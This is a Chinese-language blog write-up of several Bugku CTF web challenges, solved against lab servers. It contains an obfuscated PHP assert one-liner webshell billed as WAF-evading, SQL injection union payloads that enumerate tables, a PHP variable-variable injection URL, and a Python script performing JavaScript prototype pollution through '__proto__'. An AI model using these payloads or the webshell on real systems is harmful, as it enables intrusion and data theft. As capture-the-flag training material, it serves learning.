bugku web篇(二)

简介: bugku web篇(二)

bugku web篇(二)

shell

描  述: 送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; KaTeX parse error: Expected 'EOF', got '#' at position 16: poc_1=explode("#̲",poc); poc_2=poc2=poc_1[0].poc_1[1].poc1[1].poc_1[2].poc_1[3].poc1[3].poc_1[4].$poc_1[5]; poc_2(poc2(_GET[‘s’])

描述中

存在参数s

存在assert()代码执行漏洞

可以利用参数s传入php代码,利用assert()执行代码

成绩查询

描  述: 来源山科大ctf

http://114.67.175.224:11678

1' or '1'='1'#

-1’ union select 1,2,3,database()#得到数据库名skctf_flag
然后爆表名:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc
-1' union select 1,2,3,skctf_flag from fl4g#

秋名山车神WEB

描  述: 秋名山车神

亲请在2s内计算老司机的车速是多少
75279524+1657764087+1201048930-1446001271*2101146556+1437496613-942194510*1041927694*1606247404-589875910-1598848247=?;
import requests
from lxml import etree
'''
eval():将字符串str当成有效的表达式来求值并返回计算结果
'''
url = 'http://114.67.175.224:12793/'
response = requests.session()
re = response.get(url=url).content.decode('utf-8')
elements = etree.HTML(re).xpath('//div/text()')[0][0:-3]
result = eval(elements)
print(result,'\n')
data = {
    'value':result
}
flag = response.post(url=url,data=data).content.decode('utf-8')
# flag_x = etree.HTML(flag)
# # print(etree.tostring(flag_x,encoding='utf-8').decode('utf-8'))
print(flag)

速度要快

描  述: 速度要快!

http://114.67.175.224:18523

抓包对flag base64解密两次

import requests#bugku 速度要快 --爬虫练习
import base64
s =requests.Session()
headers =s.get("http://114.67.175.224:18523/").headers
str1 = base64.b64decode(headers['flag'])
str2 = base64.b64decode(repr(str1).split(':')[1])
data= {'margin':str2}
flag = s.post("http://114.67.175.224:18523/",data=data)
print(flag.text)

flag{9c1d2117687e481ce51f93f06a3b17e6}

闪电十六鞭

WEB 已解决

描  述: flag{}

http://114.67.175.224:11387/?flag=$a=%27flxg%27;$a{2}=%27a%27;11111111111111111;?%3E%3C?=$$a;?%3E

sodirty

index.js文件

打开index.js得到源代码

发现set-value,判断存在js原型链污染

import requests
import random
from bs4 import BeautifulSoup
import re
import base64
s = requests.session() #保持同一个会话
def reg(url):
    url=url+"reg"
    r=s.get(url)
    print(r.text)
def update(url,data):
    url=url+"update"
    print(url)
    r=s.post(url,data=data)
    print(r.text)
def getflag(url,data):
    url=url+"getflag"
    r=s.post(url,data=data)
    print(r.text)
url="http://114.67.175.224:13101/"
reg(url)
data={"attrkey":"age","attrval":"20"}
update(url,data)
data={"attrkey":"__proto__.pwd","attrval":"123"}
update(url,data)
data={"password":"123","key":"pwd"}
getflag(url,data)

字符?正则?

描  述: 字符?正则?

<?php 
highlight_file('2.php');
$key='flag{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

.                                  匹配除 "\n" 之外的任何单个字符
*                                 匹配它前面的表达式0次或多次,等价于{0,}
{4,7}                           最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 4 到 7 个任意字符
\/                                匹配 / ,这里的 \ 是为了转义
[a-z]                           匹配所有小写字母
[:punct:]                     匹配任何标点符号
/i                                表示不分大小写
http://114.67.175.224:14152/?id=keykey11111key:/5/keya=

相关文章
|
JavaScript 前端开发
Bugku CTF web 你必须让他停下来 解题思路
Bugku CTF web 你必须让他停下来 解题思路
257 2
|
SQL XML 安全
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
Bugku CTF web GET 解题思路
Bugku CTF web GET 解题思路
284 0
|
Linux PHP 开发工具
bugku web篇(一)
bugku web篇(一)
285 0
bugku web篇(一)
|
SQL 安全 PHP
bugku web篇(三)
bugku web篇(三)
205 0
bugku web篇(三)
|
程序员 Shell PHP
CTF BugKu平台———(Web篇②)
CTF BugKu平台———(Web篇②)总结
526 0
CTF BugKu平台———(Web篇②)
|
Shell PHP 开发工具
CTF BugKu平台—(Web篇①)
CTF BugKu平台—(Web篇①)
663 0
|
1月前
|
算法 Java Go
【GoGin】(1)上手Go Gin 基于Go语言开发的Web框架,本文介绍了各种路由的配置信息;包含各场景下请求参数的基本传入接收
gin 框架中采用的路优酷是基于httprouter做的是一个高性能的 HTTP 请求路由器,适用于 Go 语言。它的设计目标是提供高效的路由匹配和低内存占用,特别适合需要高性能和简单路由的应用场景。
222 5
|
5月前
|
缓存 JavaScript 前端开发
鸿蒙5开发宝藏案例分享---Web开发优化案例分享
本文深入解读鸿蒙官方文档中的 `ArkWeb` 性能优化技巧,从预启动进程到预渲染,涵盖预下载、预连接、预取POST等八大优化策略。通过代码示例详解如何提升Web页面加载速度,助你打造流畅的HarmonyOS应用体验。内容实用,按需选用,让H5页面快到飞起!